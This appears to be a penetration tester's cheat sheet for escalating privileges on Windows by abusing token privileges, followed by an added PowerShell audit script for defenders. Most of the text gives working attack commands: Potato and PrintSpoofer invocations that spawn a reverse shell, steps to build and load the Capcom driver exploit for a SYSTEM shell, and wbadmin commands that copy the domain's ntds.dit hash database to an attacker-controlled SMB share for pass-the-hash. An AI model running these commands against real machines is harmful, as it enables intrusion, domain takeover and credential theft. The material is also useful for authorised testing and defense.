
Privilege Abuse

SeImpersonatePrivilege

  • Rotten Potato
    • Works up until sometime in 2019.
    • Patched on latest Windows 10.
  • Juicy Potato
    • JuicyPotato.exe -l 1337 -p -t * -c <{CLSID}>
  • Rogue Potato
    • Instructions
      • Listener on Kali: sudo socat tcp-listen:135,reuseaddr,fork tcp:<Victim ip address>:9999
      • On victim Windows machine: RoguePotato.exe -r 10.0.0.5 -l 9999 -e "C:\windows\system32\cmd.exe"
  • PrintSpoofer
    • Targets print spooler service
    • Does not require any port forwarding like potato exploits.
    • PrintSpoofer.exe -i -c "C:\reverse\shell.exe"

SeAssignPrimaryTokenPrivilege

  • Same Potato exploits as listed under SeImpersonatePrivilege

SeLoadDriverPrivilege

  • Capcom.sys from fuzzysecurity
  • https://github.com/TarlogicSecurity/EoPLoadDriver/
    • eoploaddriver.cpp
  • ExploitCapcom from GitHub
  • Compile EoPLoadDriver in visual studio
    • Create a new project
      • Console app
      • Name it LoadDriver
    • Open LoadDriver.cpp
      • Replace all contents with contents from eoploaddriver.cpp
    • Select "Release" and "x64"
    • Build --> Rebuild Solution. LoadDriver.exe should be created.
  • Compile ExploitCapCom
    • File --> Open --> Project/Solution
      • Select Exploit Capcom
      • Set "Release" and "x64"
      • Rebuild solution
      • ExploitCapCom.exe should be created
  • Transfer ExploitCapCom.exe, LoadDriver.exe, and capcom.sys to victim machine
    • LoadDriver.exe System\CurrentControlSet\MyService C:\
    • .\ExploitCapCom.exe
    • Should have system shell.

SeBackupPrivilege

  • Grants read access to all objects on the system regardless of ACL
    • Read sensitive files
    • Extract hashes
      • Pass-the-hash
      • Crack them

Backup ntds file to SMB server

Create NTFS share on attacker

  • Create a 2 GB image file called ntfs.disk: dd if=/dev/zero of=ntfs.disk bs=1024M count=2
  • Attach it to a loop device: sudo losetup -fP ntfs.disk
  • Check which loop device was assigned: losetup
  • Format it as NTFS: sudo mkfs.ntfs /dev/loop0
  • Mount it on a folder: sudo mount /dev/loop0 ./smb
  • Edit /etc/samba/smb.conf to add the share (see below)
  • Restart Samba: sudo systemctl restart smbd

/etc/samba/smb.conf:

[shared]
comment = <anything>
browseable = yes
path = <local path to SMB share>
read only = no
guest ok = yes

Backup ntds file from victim

echo y | wbadmin start backup -backuptarget:\\<ip address>\shared -include:C:\windows\ntds\

Extract contents of .vhdx on victim (using attacker SMB share)

echo y | wbadmin start recovery -version:<version> -itemtype:file -items:C:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl

ntds.dit should be in C:\

SeRestorePrivilege

  • Grants write access to all objects on the system regardless of ACL
  • Modify service binaries
  • Overwrite DLLs used by SYSTEM processes
  • Modify registry settings

SeTakeOwnershipPrivilege

  • Lets the holder take ownership of any object, regardless of its ACL
  • Once a file is owned, its ACL can be rewritten, so the outcome is the same as SeRestorePrivilege
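As an added defender-side audit (not part of the original notes), this PowerShell script exports the local User Rights Assignment with secedit, reports which principals hold the privileges covered on this page, and then shows which of them the current token already holds. The temp file location and the Resolve-Sid helper are my own; run it from an elevated prompt, since secedit /export needs admin rights.

```powershell
# Privileges covered on this page; any non-admin holder is worth reviewing
$dangerous = @('SeImpersonatePrivilege','SeAssignPrimaryTokenPrivilege',
               'SeLoadDriverPrivilege','SeBackupPrivilege',
               'SeRestorePrivilege','SeTakeOwnershipPrivilege')

# Export only the User Rights Assignment area to a temporary .inf file
$cfg = Join-Path $env:TEMP 'userrights.inf'
secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null

function Resolve-Sid([string]$Entry) {
    # secedit writes SIDs with a leading '*'; plain names appear without it
    $value = $Entry.TrimStart('*')
    if ($value -notmatch '^S-1-') { return $value }
    try {
        $sid = New-Object System.Security.Principal.SecurityIdentifier($value)
        return $sid.Translate([System.Security.Principal.NTAccount]).Value
    } catch { return $value }   # orphaned or unresolvable SID: keep raw value
}

# Lines in [Privilege Rights] look like: SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
$inSection = $false
$report = foreach ($line in Get-Content $cfg) {
    if ($line -match '^\[(.+)\]$') { $inSection = ($Matches[1] -eq 'Privilege Rights'); continue }
    if (-not $inSection -or $line -notmatch '^\s*(Se\w+)\s*=\s*(.*)$') { continue }
    $priv = $Matches[1]
    if ($dangerous -notcontains $priv) { continue }
    foreach ($e in ($Matches[2] -split ',')) {
        $e = $e.Trim()
        if ($e -eq '') { continue }   # privilege assigned to nobody
        [pscustomobject]@{ Privilege = $priv; Principal = Resolve-Sid $e }
    }
}
Remove-Item $cfg -ErrorAction SilentlyContinue

# Who holds each of these privileges on this machine
$report | Sort-Object Privilege, Principal | Format-Table -AutoSize

# Which of them the current token already has (Enabled or Disabled)
whoami /priv | Select-String ($dangerous -join '|')
```

Service accounts such as NETWORK SERVICE and LOCAL SERVICE hold SeImpersonatePrivilege by default, so the review point is any additional user or group in the list, plus any of these privileges showing up in the whoami output of a low-privilege session.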

More reading on token abuse: https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt